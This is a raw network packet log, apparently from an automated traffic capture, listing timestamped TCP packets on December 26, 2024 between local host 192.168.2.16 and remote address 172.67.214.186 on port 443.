                                                                                                                                                                              Dec 26, 2024 18:26:49.191077948 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.191082954 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.191121101 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.191129923 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.197168112 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.197213888 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.197257042 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.197263956 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.197294950 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.197314024 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.204317093 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.204379082 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.204462051 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.204467058 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.204519987 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.211071968 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.211114883 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.211154938 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.211159945 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.211196899 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.211215973 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.218398094 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.218436956 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.218601942 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.218606949 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.218667030 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.228239059 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.228317976 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.228352070 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.228421926 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.387989044 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.388025045 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.388096094 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.388103962 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.388122082 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.388151884 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.394251108 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.394299984 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.394335985 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.394340038 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.394366980 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.394382954 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.401279926 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.401349068 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.401369095 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.401375055 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.401416063 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.401434898 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.408369064 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.408394098 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.408441067 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.408444881 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.408474922 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.408497095 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.414727926 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.414757013 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.414798975 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.414803982 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.414835930 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.414855957 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.422255993 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.422302961 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.422337055 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.422343016 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.422363043 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.422384977 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.428627014 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.428672075 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.428724051 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.428729057 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.428761959 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.428780079 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.441333055 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.441376925 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.441412926 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.441421986 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.441445112 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.441467047 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.598598003 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.598654985 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.598702908 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.598709106 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.598753929 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.604635000 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.604656935 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.604724884 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.604732037 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.604779005 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.612010002 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.612025976 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.612085104 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.612092018 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.612137079 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.618905067 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.618927956 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.618988037 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.618993998 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.619040012 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.626102924 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.626120090 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.626173973 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.626178026 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.626229048 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.632752895 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.632769108 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.632831097 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.632834911 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.632884979 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.638988972 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.639013052 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.639065981 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.639070988 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.639096022 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.639120102 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.650547981 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.650564909 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.650625944 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.650631905 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.650691032 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.808836937 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.808854103 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.808927059 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.808931112 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.808969021 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.814994097 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.815006971 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.815073967 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.815078974 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.815090895 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.815130949 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.820097923 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.820153952 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.820171118 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.820174932 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.820228100 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.826395035 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.826409101 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.826469898 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.826474905 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.826497078 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.826514959 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.833635092 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.833655119 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.833720922 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.833725929 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.833772898 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.840327978 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.840342045 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.840419054 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.840425014 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.840468884 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.847395897 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.847414017 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.847495079 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.847521067 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.847579956 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.858432055 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.858448982 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.858521938 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:49.858527899 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:49.858572960 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.017024994 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.017055035 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.017132998 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.017139912 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.017187119 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.024162054 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.024177074 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.024245024 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.024251938 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.024308920 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.031241894 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.031255960 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.031330109 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.031336069 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.031380892 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.038399935 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.038414001 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.038487911 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.038492918 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.038516045 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.038528919 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.044713020 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.044734955 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.044790983 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.044797897 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.044840097 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.051352024 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.051371098 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.051435947 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.051441908 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.051485062 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.058609009 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.058624029 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.058698893 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.058703899 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.058743954 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.078464031 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.078479052 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.078548908 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.078553915 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.078603983 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.240572929 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.240592957 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.240669012 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.240677118 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.240720987 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.246826887 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.246843100 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.246915102 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.246922016 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.246962070 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.253912926 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.253927946 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.253993988 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.253998995 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.254050970 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.261094093 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.261110067 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.261177063 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.261183023 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.261230946 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.267514944 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.267529011 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.267591953 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.267596006 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.267636061 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.274924040 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.274936914 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.275002003 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.275007010 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.275060892 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.281196117 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.281210899 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.281277895 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.281282902 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.281322002 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.289083958 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.289098978 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.289164066 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.289169073 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.289215088 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.451157093 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.451174974 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.451261997 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.451276064 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.451380968 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.457479000 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.457526922 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.457560062 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.457565069 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.457600117 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.457619905 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.464487076 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.464503050 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.464572906 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.464576960 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.464623928 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.471678972 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.471694946 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.471760035 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.471765041 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.471803904 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.477931976 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.477946997 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.478013039 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.478018045 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.478064060 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.484638929 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.484652996 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.484731913 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.484736919 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.484780073 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.491935015 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.491949081 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.492016077 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.492022038 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.492075920 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.499303102 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.499322891 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.499377966 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.499382973 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.499409914 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.499433041 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.661648989 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.661667109 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.661744118 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.661753893 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.661808968 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.667927980 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.667943001 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.668019056 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:50.668025970 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:50.668071985 CET49719443192.168.2.16172.67.214.186
